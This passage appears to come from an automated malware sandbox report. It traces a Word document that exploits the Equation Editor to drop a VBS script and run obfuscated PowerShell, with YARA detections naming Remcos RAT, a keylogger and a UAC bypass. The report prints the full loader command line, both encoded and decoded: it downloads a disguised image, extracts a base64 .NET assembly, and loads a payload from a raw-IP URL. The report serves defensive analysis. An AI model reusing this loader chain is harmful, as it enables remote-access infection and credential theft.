7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                          Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                          2024-09-06 09:26:02 UTC4096INData Raw: 94 48 f4 c9 55 d7 2a e1 34 f2 6d 3e a3 df 2a 92 b3 3e d0 14 06 e2 c0 c0 b6 a7 60 da 00 ac aa 4c 04 1e 53 ee db 76 2b a5 e3 9f 77 8c a9 49 19 8b 01 43 db 0d a7 f0 c8 25 4f 59 90 1e e4 1e 30 11 3a ba 40 84 31 03 9e b9 ab a6 d5 2c fa 5d be a6 2a 28 ae ee 46 64 6a 21 8f 4f a8 29 cb 01 84 d1 cc 90 ce a4 06 25 b8 23 00 72 b2 ac f3 06 52 7d 6d 5c d5 73 97 f0 f3 ff 00 6d 53 40 70 7b 5f 6c 0c a5 7c e9 2c 30 25 8d 0f ae 31 a4 45 8a 6f 32 46 20 2a 96 55 1f 88 f1 fa 60 6d 3a 17 00 2f 41 ea 38 16 d4 47 0a 80 5c 71 d4 f6 18 b9 d4 cd 14 9e a6 0a 82 c8 41 c9 db c7 7f ae 67 6a 48 9b 53 23 05 2a 59 81 00 fb 56 03 f3 78 9c 61 a9 2d 87 73 db 19 1a b4 68 43 0b 61 59 98 da 15 15 fb c0 38 e6 f1 8d 26 91 11 8b b3 9a fe 1f 63 80 74 64 91 37 2a 31 53 d8 e2 ba c6 52 9b 08 b6 3d 3d
                          Data Ascii: HU*4m>*>`LSv+wIC%OY0:@1,]*(Fdj!O)%#rR}m\smS@p{_l|,0%1Eo2F *U`m:/A8G\qAgjHS#*YVxa-shCaY8&ctd7*1SR==


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:05:25:54
                          Start date:06/09/2024
                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                          Imagebase:0x13fc30000
                          File size:1'423'704 bytes
                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:1
                          Start time:05:25:55
                          Start date:06/09/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:05:25:57
                          Start date:06/09/2024
                          Path:C:\Windows\SysWOW64\wscript.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\escreenthepicturewithbutters.vBS"
                          Imagebase:0xac0000
                          File size:141'824 bytes
                          MD5 hash:979D74799EA6C8B8167869A68DF5204A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:05:25:58
                          Start date:06/09/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RwBG? ? ? ? ?EY? ? ? ? ?UgBF? ? ? ? ?Fc? ? ? ? ?Lw? ? ? ? ?1? ? ? ? ?DM? ? ? ? ?Lw? ? ? ? ?0? ? ? ? ?Dg? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?DE? ? ? ? ?N? ? ? ? ?? ? ? ? ?y? ? ? ? ?C4? ? ? ? ?OQ? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?Lg? ? ? ? ?1? ? ? ? ?Dg? ? ? ? ?Lw? ? ? ? ?v? ? ? ? ?Do? ? ? ? ?c? ? ? ? ?B0? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?C? ? ? ? ?? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?YQB0? ? ? ? ?Gk? ? ? ? ?dgBh? ? ? ? ?GQ? ? ? ? ?bw? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?JwBS? ? ? ? ?GU? ? ? ? ?ZwBB? ? ? ? ?HM? ? ? ? ?bQ? ? ? ? ?n? ? ? ? ?Cw? ? ? ? ?Jw? ? ? ? ?n? ? ? ? ?Ck? ? ? ? ?KQ? ? ? ? ?=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                          Imagebase:0xff0000
                          File size:427'008 bytes
                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:05:25:59
                          Start date:06/09/2024
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                          Imagebase:0xff0000
                          File size:427'008 bytes
                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          Target ID:8
                          Start time:05:26:04
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:high
                          Has exited:false

                          Target ID:11
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\grmnuvnmumxdrrgkqp"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rtrfuoyfiupqcguozzwaq"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:13
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:14
                          Start time:05:26:09
                          Start date:06/09/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\towqvgihwchvemqsikjctbjd"
                          Imagebase:0xb10000
                          File size:64'704 bytes
                          MD5 hash:8FE9545E9F72E460723F484C304314AD
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:15
                          Start time:05:26:17
                          Start date:06/09/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Reset < >
                            Memory Dump Source
